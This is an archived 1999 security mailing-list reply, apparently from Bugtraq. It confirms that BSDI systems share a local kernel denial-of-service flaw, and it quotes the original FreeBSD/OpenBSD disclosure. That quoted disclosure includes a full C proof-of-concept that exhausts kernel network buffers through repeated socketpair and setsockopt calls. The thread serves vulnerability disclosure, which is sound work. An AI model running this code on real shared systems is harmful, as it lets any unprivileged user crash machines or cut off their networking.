Re: Local DoS on network by unpriviledged user using setsockopt()

From: John N Dvorak (dvorakat_private)
Date: Fri Sep 03 1999 - 06:47:18 PDT

Next message: Aleph One: "Microsoft Security Bulletin (MS99-034)"

Previous message: Free, Bob: "Compaq CIM UG Overwrites Legal Notice"
Maybe in reply to: Sven Berkvens: "Local DoS on network by unpriviledged user using setsockopt()"
Next in thread: John N Dvorak: "Re: Local DoS on network by unpriviledged user using setsockopt()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Just Verified all versions of BSDI in my possession (2.1, 3.1, 4.0, 4.01)
are vulnerable.   I do not have all the details, but the kernel panics.
System eventually reboots in 2.1.

Can be executed by any non-privileged user.

JD

On Wed, 1 Sep 1999, Sven Berkvens wrote:

>Recently, I mailed this mailing to a number of people who are concerned
>with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The
>mailing was NOT intended to be made public, but somehow it was. Here is
>my original mailing:
>
>
>--- Forwarded ---
>
>I stumbled across a denial of service attack on FreeBSD systems, where
>an unpriviledged user can panic the kernel. Quick and dirty testing
>(code attached at the end of this mail) showed OpenBSD is vulnerable
>too:
>
>FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to
>test it on older FreeBSD versions.
>
>OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192:
>The kernel logs one "/bsd: mb_map full" and all processes trying to send
>something over the network get stuck waiting in mbuf. Locally the system
>continues to function. Tested by a friend.
>
>NetBSD: Not available, but it is highly probable that the affected code
>in OpenBSD is from its parent NetBSD.
>
>As far as I'm concerned, this can be handled quietly and without much
>haste. Knowledge of this problem is limited and there is absolutely no
>intention of publishing this exploit or messages to Bugtraq.
>
>With kind regards,
>Sven Berkvens (svenat_private)
>Long time FreeBSD-system administrator
>
>
>
>The source code for the program that causes this:
>
>#include	<unistd.h>
>#include	<sys/socket.h>
>#include	<fcntl.h>
>
>#define		BUFFERSIZE	204800
>
>extern	int
>main(void)
>{
>	int		p[2], i;
>	char		crap[BUFFERSIZE];
>
>	while (1)
>	{
>		if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
>			break;
>		i = BUFFERSIZE;
>		setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
>		setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
>		setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
>		setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
>		fcntl(p[0], F_SETFL, O_NONBLOCK);
>		fcntl(p[1], F_SETFL, O_NONBLOCK);
>		write(p[0], crap, BUFFERSIZE);
>		write(p[1], crap, BUFFERSIZE);
>	}
>	exit(0);
>}
>
>----- End forwarded message -----
>

===========================================
John N Dvorak | dvorakat_private
Director of Technology
CapuNet, LLC - Corporate Internet Solutions
(301) 881-4900 x8018
===========================================

Next message: Aleph One: "Microsoft Security Bulletin (MS99-034)"
Previous message: Free, Bob: "Compaq CIM UG Overwrites Legal Notice"
Maybe in reply to: Sven Berkvens: "Local DoS on network by unpriviledged user using setsockopt()"
Next in thread: John N Dvorak: "Re: Local DoS on network by unpriviledged user using setsockopt()"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:01:31 PDT